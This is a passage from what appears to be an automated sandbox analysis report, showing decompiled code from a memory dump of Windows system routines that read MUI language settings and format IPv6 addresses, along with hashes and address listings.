                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                    • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                                                                    • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                    • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C6010C, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                                                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C88788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E00C88788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00C88460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00C6E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00C8718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00C88460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00C8718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00C88460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00C88460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00C88460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00C8718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00C6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00C62340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00C7E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00C6E2A8(_t322,  &_v68, _v16);
								if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00C7E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00C6E2A8(_t322,  &_v68, _t236);
								if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00C8718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00C6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00C62340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00C7E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00C6E2A8(_v12,  &_v68, _v16);
							if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00C7E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00C6E2A8(_t322,  &_v68, _t269);
							if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00C8718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00C6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00C62340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00C7E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00C6E2A8(_v12,  &_v68, _v16);
						if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00C7E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00C6E2A8(_t322,  &_v68, _t296);
						if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                    0x00c88788
                                                                                                                                                    0x00c88788
                                                                                                                                                    0x00c88791
                                                                                                                                                    0x00c88794
                                                                                                                                                    0x00c88798
                                                                                                                                                    0x00c8879b
                                                                                                                                                    0x00c8879e
                                                                                                                                                    0x00c887a1
                                                                                                                                                    0x00c887a4
                                                                                                                                                    0x00c887a7
                                                                                                                                                    0x00c887aa
                                                                                                                                                    0x00c887af
                                                                                                                                                    0x00cd1ad3
                                                                                                                                                    0x00c88b0a
                                                                                                                                                    0x00c88b0d
                                                                                                                                                    0x00c88b13
                                                                                                                                                    0x00c88b19
                                                                                                                                                    0x00c88b1f
                                                                                                                                                    0x00c88b25
                                                                                                                                                    0x00c88b2b
                                                                                                                                                    0x00c88b31
                                                                                                                                                    0x00c88b37
                                                                                                                                                    0x00c88b3d
                                                                                                                                                    0x00c88b46
                                                                                                                                                    0x00c88b46
                                                                                                                                                    0x00c887c6
                                                                                                                                                    0x00c887d0
                                                                                                                                                    0x00cd1ae0
                                                                                                                                                    0x00cd1ae6
                                                                                                                                                    0x00cd1af8
                                                                                                                                                    0x00cd1af8
                                                                                                                                                    0x00cd1afd
                                                                                                                                                    0x00cd1afe
                                                                                                                                                    0x00cd1b01
                                                                                                                                                    0x00cd1b06
                                                                                                                                                    0x00cd1b06
                                                                                                                                                    0x00c887d6
                                                                                                                                                    0x00c887f2
                                                                                                                                                    0x00c887f7
                                                                                                                                                    0x00c88807
                                                                                                                                                    0x00c8880a
                                                                                                                                                    0x00c8880f
                                                                                                                                                    0x00c88810
                                                                                                                                                    0x00c88813
                                                                                                                                                    0x00c88818
                                                                                                                                                    0x00c88818
                                                                                                                                                    0x00c8882c
                                                                                                                                                    0x00c88831
                                                                                                                                                    0x00c88838
                                                                                                                                                    0x00c88908
                                                                                                                                                    0x00c88920
                                                                                                                                                    0x00c889f0
                                                                                                                                                    0x00c88a08
                                                                                                                                                    0x00c88af6
                                                                                                                                                    0x00c88af6
                                                                                                                                                    0x00c88af8
                                                                                                                                                    0x00c88afb
                                                                                                                                                    0x00cd1beb
                                                                                                                                                    0x00cd1beb
                                                                                                                                                    0x00c88b04
                                                                                                                                                    0x00cd1bf8
                                                                                                                                                    0x00cd1c0e
                                                                                                                                                    0x00cd1c13
                                                                                                                                                    0x00cd1c16
                                                                                                                                                    0x00cd1c16
                                                                                                                                                    0x00cd1bf8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88b04
                                                                                                                                                    0x00c88a0e
                                                                                                                                                    0x00c88a11
                                                                                                                                                    0x00c88a14
                                                                                                                                                    0x00c88a15
                                                                                                                                                    0x00c88a18
                                                                                                                                                    0x00c88a22
                                                                                                                                                    0x00c88b59
                                                                                                                                                    0x00c88a28
                                                                                                                                                    0x00c88a3c
                                                                                                                                                    0x00c88a3c
                                                                                                                                                    0x00c88a42
                                                                                                                                                    0x00cd1bb0
                                                                                                                                                    0x00cd1b11
                                                                                                                                                    0x00cd1b11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88a48
                                                                                                                                                    0x00c88a51
                                                                                                                                                    0x00c88a5b
                                                                                                                                                    0x00c88a5e
                                                                                                                                                    0x00c88a61
                                                                                                                                                    0x00c88a69
                                                                                                                                                    0x00c88a69
                                                                                                                                                    0x00c88a6d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88a74
                                                                                                                                                    0x00c88a7c
                                                                                                                                                    0x00c88a7d
                                                                                                                                                    0x00c88a91
                                                                                                                                                    0x00c88a93
                                                                                                                                                    0x00c88a93
                                                                                                                                                    0x00c88a98
                                                                                                                                                    0x00c88a9b
                                                                                                                                                    0x00c88aa1
                                                                                                                                                    0x00c88aa1
                                                                                                                                                    0x00c88aa4
                                                                                                                                                    0x00c88aaa
                                                                                                                                                    0x00c88ab1
                                                                                                                                                    0x00c88ac5
                                                                                                                                                    0x00c88ac7
                                                                                                                                                    0x00c88ac7
                                                                                                                                                    0x00c88ac5
                                                                                                                                                    0x00c88ace
                                                                                                                                                    0x00cd1bc9
                                                                                                                                                    0x00cd1bce
                                                                                                                                                    0x00cd1bd2
                                                                                                                                                    0x00cd1bd2
                                                                                                                                                    0x00c88ad8
                                                                                                                                                    0x00c88aeb
                                                                                                                                                    0x00c88aeb
                                                                                                                                                    0x00c88af0
                                                                                                                                                    0x00c88af4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88af4
                                                                                                                                                    0x00c88a42
                                                                                                                                                    0x00c88926
                                                                                                                                                    0x00c88929
                                                                                                                                                    0x00c8892c
                                                                                                                                                    0x00c8892d
                                                                                                                                                    0x00c88930
                                                                                                                                                    0x00c88935
                                                                                                                                                    0x00c8893a
                                                                                                                                                    0x00c88b51
                                                                                                                                                    0x00c88940
                                                                                                                                                    0x00c88954
                                                                                                                                                    0x00c88954
                                                                                                                                                    0x00c8895a
                                                                                                                                                    0x00cd1b63
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88960
                                                                                                                                                    0x00c88969
                                                                                                                                                    0x00c88973
                                                                                                                                                    0x00c88976
                                                                                                                                                    0x00c88979
                                                                                                                                                    0x00c8897e
                                                                                                                                                    0x00c88981
                                                                                                                                                    0x00c88981
                                                                                                                                                    0x00c88986
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cd1b6e
                                                                                                                                                    0x00cd1b74
                                                                                                                                                    0x00cd1b7b
                                                                                                                                                    0x00cd1b8f
                                                                                                                                                    0x00cd1b91
                                                                                                                                                    0x00cd1b91
                                                                                                                                                    0x00cd1b99
                                                                                                                                                    0x00cd1b9c
                                                                                                                                                    0x00cd1ba2
                                                                                                                                                    0x00cd1ba2
                                                                                                                                                    0x00c8898c
                                                                                                                                                    0x00c88992
                                                                                                                                                    0x00c88999
                                                                                                                                                    0x00c889ad
                                                                                                                                                    0x00cd1ba8
                                                                                                                                                    0x00cd1ba8
                                                                                                                                                    0x00c889ad
                                                                                                                                                    0x00c889b6
                                                                                                                                                    0x00c889c8
                                                                                                                                                    0x00c889cd
                                                                                                                                                    0x00c889d0
                                                                                                                                                    0x00c889d0
                                                                                                                                                    0x00c889d6
                                                                                                                                                    0x00c889e8
                                                                                                                                                    0x00c889e8
                                                                                                                                                    0x00c889ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c889ed
                                                                                                                                                    0x00c8895a
                                                                                                                                                    0x00c8883e
                                                                                                                                                    0x00c88841
                                                                                                                                                    0x00c88844
                                                                                                                                                    0x00c88845
                                                                                                                                                    0x00c88848
                                                                                                                                                    0x00c8884d
                                                                                                                                                    0x00c88852
                                                                                                                                                    0x00c88b49
                                                                                                                                                    0x00c88858
                                                                                                                                                    0x00c8886c
                                                                                                                                                    0x00c8886c
                                                                                                                                                    0x00c88872
                                                                                                                                                    0x00cd1b0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88878
                                                                                                                                                    0x00c88881
                                                                                                                                                    0x00c8888b
                                                                                                                                                    0x00c8888e
                                                                                                                                                    0x00c88891
                                                                                                                                                    0x00c88896
                                                                                                                                                    0x00c88899
                                                                                                                                                    0x00c88899
                                                                                                                                                    0x00c8889e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cd1b21
                                                                                                                                                    0x00cd1b27
                                                                                                                                                    0x00cd1b2e
                                                                                                                                                    0x00cd1b42
                                                                                                                                                    0x00cd1b44
                                                                                                                                                    0x00cd1b44
                                                                                                                                                    0x00cd1b4c
                                                                                                                                                    0x00cd1b4f
                                                                                                                                                    0x00cd1b55
                                                                                                                                                    0x00cd1b55
                                                                                                                                                    0x00c888a4
                                                                                                                                                    0x00c888aa
                                                                                                                                                    0x00c888b1
                                                                                                                                                    0x00c888c5
                                                                                                                                                    0x00cd1b5b
                                                                                                                                                    0x00cd1b5b
                                                                                                                                                    0x00c888c5
                                                                                                                                                    0x00c888ce
                                                                                                                                                    0x00c888e0
                                                                                                                                                    0x00c888e5
                                                                                                                                                    0x00c888e8
                                                                                                                                                    0x00c888e8
                                                                                                                                                    0x00c888ee
                                                                                                                                                    0x00c88900
                                                                                                                                                    0x00c88900
                                                                                                                                                    0x00c88905
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88905

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00C88914
                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 00C887E6
                                                                                                                                                    • WindowsExcludedProcs, xrefs: 00C887C1
                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 00C88827
                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 00C889FC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                    • Opcode ID: 212a2d003c5ba1f301fe2542111c81393d93b43f3072e4563a6a6e01cae757ca
                                                                                                                                                    • Instruction ID: 77c5f41c2012b576a815de03758803a08cba251b330ff4858c3d8366c0224474
                                                                                                                                                    • Opcode Fuzzy Hash: 212a2d003c5ba1f301fe2542111c81393d93b43f3072e4563a6a6e01cae757ca
                                                                                                                                                    • Instruction Fuzzy Hash: A4F126B6D00209EFCF11EFA5C981DEEB7B8FF08304F54446AE605A7611EB349A45EB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00CA13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                    			E00CA13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00C97707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xc62926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00C97707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xc69cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00C97707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00C97707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00C97707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00C97707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                    0x00ca13d5
                                                                                                                                                    0x00ca13d9
                                                                                                                                                    0x00ca13dc
                                                                                                                                                    0x00ca13de
                                                                                                                                                    0x00ca13e1
                                                                                                                                                    0x00ca13e8
                                                                                                                                                    0x00ca13ee
                                                                                                                                                    0x00cce8fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cce921
                                                                                                                                                    0x00cce921
                                                                                                                                                    0x00cce928
                                                                                                                                                    0x00cce982
                                                                                                                                                    0x00cce98a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cce99a
                                                                                                                                                    0x00cce99e
                                                                                                                                                    0x00cce9a3
                                                                                                                                                    0x00cce9a8
                                                                                                                                                    0x00cce9b9
                                                                                                                                                    0x00cce978
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cce978
                                                                                                                                                    0x00cce98a
                                                                                                                                                    0x00cce92a
                                                                                                                                                    0x00cce931
                                                                                                                                                    0x00cce944
                                                                                                                                                    0x00cce944
                                                                                                                                                    0x00cce950
                                                                                                                                                    0x00cce954
                                                                                                                                                    0x00cce959
                                                                                                                                                    0x00cce95e
                                                                                                                                                    0x00cce963
                                                                                                                                                    0x00cce970
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cce975
                                                                                                                                                    0x00cce93b
                                                                                                                                                    0x00cce980
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cce980
                                                                                                                                                    0x00cce942
                                                                                                                                                    0x00cce94b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cce94b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cce942
                                                                                                                                                    0x00ca13f4
                                                                                                                                                    0x00ca13f4
                                                                                                                                                    0x00ca13f9
                                                                                                                                                    0x00ca13fc
                                                                                                                                                    0x00ca13ff
                                                                                                                                                    0x00ca1406
                                                                                                                                                    0x00cce9cc
                                                                                                                                                    0x00cce9d2
                                                                                                                                                    0x00cce9d2
                                                                                                                                                    0x00cce9cc
                                                                                                                                                    0x00ca140c
                                                                                                                                                    0x00ca1411
                                                                                                                                                    0x00ca1431
                                                                                                                                                    0x00ca143a
                                                                                                                                                    0x00ca143c
                                                                                                                                                    0x00ca143f
                                                                                                                                                    0x00ca143f
                                                                                                                                                    0x00ca1442
                                                                                                                                                    0x00ca1447
                                                                                                                                                    0x00ca14a8
                                                                                                                                                    0x00ca14ac
                                                                                                                                                    0x00cce9e2
                                                                                                                                                    0x00cce9e7
                                                                                                                                                    0x00cce9ec
                                                                                                                                                    0x00ccea05
                                                                                                                                                    0x00ccea05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca1449
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca1449
                                                                                                                                                    0x00ca144c
                                                                                                                                                    0x00ca1459
                                                                                                                                                    0x00ca1462
                                                                                                                                                    0x00ca1469
                                                                                                                                                    0x00ca146a
                                                                                                                                                    0x00ca1470
                                                                                                                                                    0x00ca1473
                                                                                                                                                    0x00ca1476
                                                                                                                                                    0x00ca1476
                                                                                                                                                    0x00ca1490
                                                                                                                                                    0x00ca1495
                                                                                                                                                    0x00ca138e
                                                                                                                                                    0x00ca1390
                                                                                                                                                    0x00ca1397
                                                                                                                                                    0x00ca1398
                                                                                                                                                    0x00ca1399
                                                                                                                                                    0x00ca13a1
                                                                                                                                                    0x00ca13a4
                                                                                                                                                    0x00ca13a4
                                                                                                                                                    0x00ca1498
                                                                                                                                                    0x00ca149c
                                                                                                                                                    0x00ca149f
                                                                                                                                                    0x00ca14a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca14a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca14a4
                                                                                                                                                    0x00ca1413
                                                                                                                                                    0x00ca1415
                                                                                                                                                    0x00ca1416
                                                                                                                                                    0x00ca1419
                                                                                                                                                    0x00ca141c
                                                                                                                                                    0x00ca1422
                                                                                                                                                    0x00ca13b7
                                                                                                                                                    0x00ca13bc
                                                                                                                                                    0x00ca13bf
                                                                                                                                                    0x00ca13bf
                                                                                                                                                    0x00ca13c2
